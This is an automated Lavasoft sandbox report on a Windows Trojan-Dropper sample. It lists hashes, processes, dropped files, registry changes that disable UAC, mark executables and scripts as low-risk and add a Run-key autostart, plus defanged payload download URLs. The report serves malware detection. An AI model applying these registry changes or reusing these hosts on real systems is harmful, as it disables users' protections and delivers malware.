Gen.Variant.Adware.Strictor.49051_42b2afb0b1

by malwarelabrobot on April 22nd, 2016 in Malware Descriptions.

Trojan-Dropper.Win32.NSIS.abtf (Kaspersky), Gen:Variant.Adware.Strictor.49051 (B) (Emsisoft), Gen:Variant.Adware.Strictor.49051 (AdAware), Trojan.Win32.Swrort.3.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan-Dropper, Trojan, Adware


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

MD5: 42b2afb0b1e13f670af444bf40fb3434
SHA1: 90d9d4e054d1f510a77b0b56a3532d2b60de32d2
SHA256: 63a9cc6cdbbb56e9ed78ae1213e76c32a196edb1bc12d4db090892db38dce24c
SSDeep: 98304:lgbDPHGm0nvY0mFsWBTSYxTMjZNi7MFOuqS4F:mfHv0vY0msGVTyNP3qfF
Size: 4978012 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2012-02-24 21:20:04
Analyzed on: WindowsXP SP3 32-bit


Summary:

Trojan-Dropper. A Trojan program intended for the stealthy installation of other malware on the user's system.

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

setdd.exe:272
7za.exe:1932
CodecFixDivx.exe:244
mesox.exe:1904
%original file name%.exe:348
dxdiag.exe:632
irsetup.exe:492

The Trojan injects its code into the following process(es):

CodecFixDivx.exe:296
irsetup.exe:484

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process setdd.exe:272 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\lua5.1.dll (1610 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\irsetup.exe (7972 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\lua5.1.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\irsetup.exe (0 bytes)

The process 7za.exe:1932 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\setdd.exe (10753 bytes)

The process CodecFixDivx.exe:296 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\00046f60.a (76 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\000479ef.a (1774 bytes)

The process mesox.exe:1904 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\lua5.1.dll (1610 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\irsetup.exe (7972 bytes)

The process %original file name%.exe:348 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\7za.exe (15192 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\winrar-x64-520.exe (65332 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\a.7z (21345 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz2.tmp\execDos.dll (5 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsz2.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nse1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz2.tmp\execDos.dll (0 bytes)

The process irsetup.exe:484 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\after.exe (27907 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\msconfig.enc (20 bytes)
%WinDir%\chromebrowser.exe (164484 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\dxdiag.exe (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\acc.enc (20527 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\CodecFixDivx.enc (16975 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\irsetup.dat (1209 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CodecFixDivx.exe (18485 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\IRIMG2.JPG (29 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\MediaPlayer__3137_il66746.enc (14515 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\IRIMG1.JPG (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\dxdiag.enc (20 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\irsetup.dat (0 bytes)

The process irsetup.exe:492 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\G963G9AF\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KHANSXIV\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\HDQZBC5E\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\irsetup.dat (1137 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (788 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\setupfiles.txt (44 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@payment[1].txt (303 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@pastebin[1].txt (217 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0XUJW5MR\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\mesox.exe (3972701 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\IRW3.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\IRW4.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\irsetup.dat (0 bytes)

Registry activity

The process setdd.exe:272 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "78 AE BC 44 13 F0 38 EE 57 3B 80 BE BF 1F BA 73"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\_ir_sf_temp_0]
"irsetup.exe" = "Setup Application"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The process 7za.exe:1932 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "78 D1 F2 27 FD 5F 39 9C E1 AB 83 3F 3D 4D 5C 8F"

The process CodecFixDivx.exe:296 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4F 58 62 47 82 36 A0 BD A4 19 19 53 DD 36 E6 3B"

[HKCR\TypeLib\{1EA4DBF0-3C3B-11CF-810C-00AA00389B71}\1.1\0\win32]
"(Default)" = "%System%\oleacc.dll"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1461205111"
"Name" = "CodecFixDivx.exe"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache]
"@xpsp3res.dll,-20001" = "Diagnose Connection Problems..."

The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:

"IntranetName" = "1"

The process CodecFixDivx.exe:244 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "59 0B 3A 1F 8D 69 AA B3 EB 90 FA 51 0A 9C 55 7F"

The process mesox.exe:1904 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "CF A6 26 44 3B 81 21 D1 D9 B5 EE 0D 4E E0 2F 7A"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsz2.tmp\execDos.dll, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsz2.tmp\, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\_ir_sf_temp_0\irsetup.exe,"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The process %original file name%.exe:348 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AF 9F 6D B4 38 72 72 B6 9D 4A 42 43 10 42 EB 61"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsz2.tmp\execDos.dll,"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

The process dxdiag.exe:632 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D4 7B 87 9A 6F A6 23 44 17 26 E0 27 C6 7C 89 DB"

[HKCR\TypeLib\{1EA4DBF0-3C3B-11CF-810C-00AA00389B71}\1.1\0\win32]
"(Default)" = "%System%\oleacc.dll"

The process irsetup.exe:484 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Video" = ""
"Fonts" = "%WinDir%\Fonts"
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system]
"EnableLUA" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system]
"ConsentPromptBehaviorAdmin" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Attachments]
"SaveZoneInformation" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
"Common Startup" = "%Documents and Settings%\All Users\Start Menu\Programs\Startup"

"Common Documents" = "%Documents and Settings%\All Users\Documents"
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
"My Music" = "%Documents and Settings%\%current user%\My Documents\My Music"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FD F9 7E 5D 59 C5 F9 87 D2 E8 FA 35 F4 02 B5 26"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Associations]
"LowRiskFileTypes" = ".avi;.bat;.com;.cmd;.exe;.htm;.html;.lnk;.mpg;.mpeg;.mov;.mp3;.msi;.m3u;.rar;.reg;.txt;.vbs;.wav;.zip;"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"chromebrowser" = "%WinDir%\chromebrowser.exe"

The process irsetup.exe:492 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Video" = ""

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Fonts" = "%WinDir%\Fonts"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1A 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
"Common Startup" = "%Documents and Settings%\All Users\Start Menu\Programs\Startup"

"Common Documents" = "%Documents and Settings%\All Users\Documents"
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Music" = "%Documents and Settings%\%current user%\My Documents\My Music"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "67 8A 7D 1B E9 48 54 E1 6B F2 DB 9D CF ED 2E 23"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

Dropped PE files

MD5 File path
f482597af35485f86a44b370f790ed0e c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\00046f60.a
ec6e2decd6d06007df3ded778b5e8dfc c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\000479ef.a
42badc1d2f03a8b1e4875740d3d49336 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\7za.exe
a069ef983c8877cb450c4e15354ea3a9 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\CodecFixDivx.exe
122e6a275e8a673d73a2ff59aa2249c4 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\_ir_sf_temp_0\after.exe
9bdcf813d65265255b820bc7a704da3c c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\_ir_sf_temp_0\irsetup.exe
c3f5f4a1fb69b5889f0bbb313cf6017f c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\_ir_sf_temp_0\lua5.1.dll
02f06e93d610a5426eaed734af4db35b c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\dxdiag.exe
7db9449e8c71459d3d805cc45be1bb59 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\mesox.exe
0deb397ca1e716bb7b15e1754e52b2ac c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsz2.tmp\execDos.dll
d4560733b5632b5107526e144a6e72e6 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\setdd.exe
6158a1045c148df1aaddce15091362f3 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\winrar-x64-520.exe
122e6a275e8a673d73a2ff59aa2249c4 c:\WINDOWS\chromebrowser.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Name     Virtual Address   Virtual Size   Raw Size   Entropy   Section MD5
.text    4096              29324          29696      4.50526   419d4e1be1ac35a5db9c47f553b27cea
.rdata   36864             11118          11264      3.11773   cca1ca3fbf99570f6de9b43ce767f368
.data    49152             469916         512        1.25109   77f0839f8ebea31040e462523e1c770e
.ndata   520192            528384         0          0         d41d8cd98f00b204e9800998ecf8427e
.rsrc    1048576           7477           7680       3.47212   e82a5acd2b91e85e9209fa6fb84fd775
.reloc   1056768           4054           4096       3.87317   0fe4ef0a01be51cb5362c98b207ecf50

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Total found: 5

URLs

URL IP
hxxp://pastebin.com/raw/NgVcEX79 104.20.63.56
hxxp://alfafile.net/file/NFUG 195.211.221.157
hxxp://a7.alfafile.net/dl/8oGAY/CodecFix A.exe 78.108.187.86
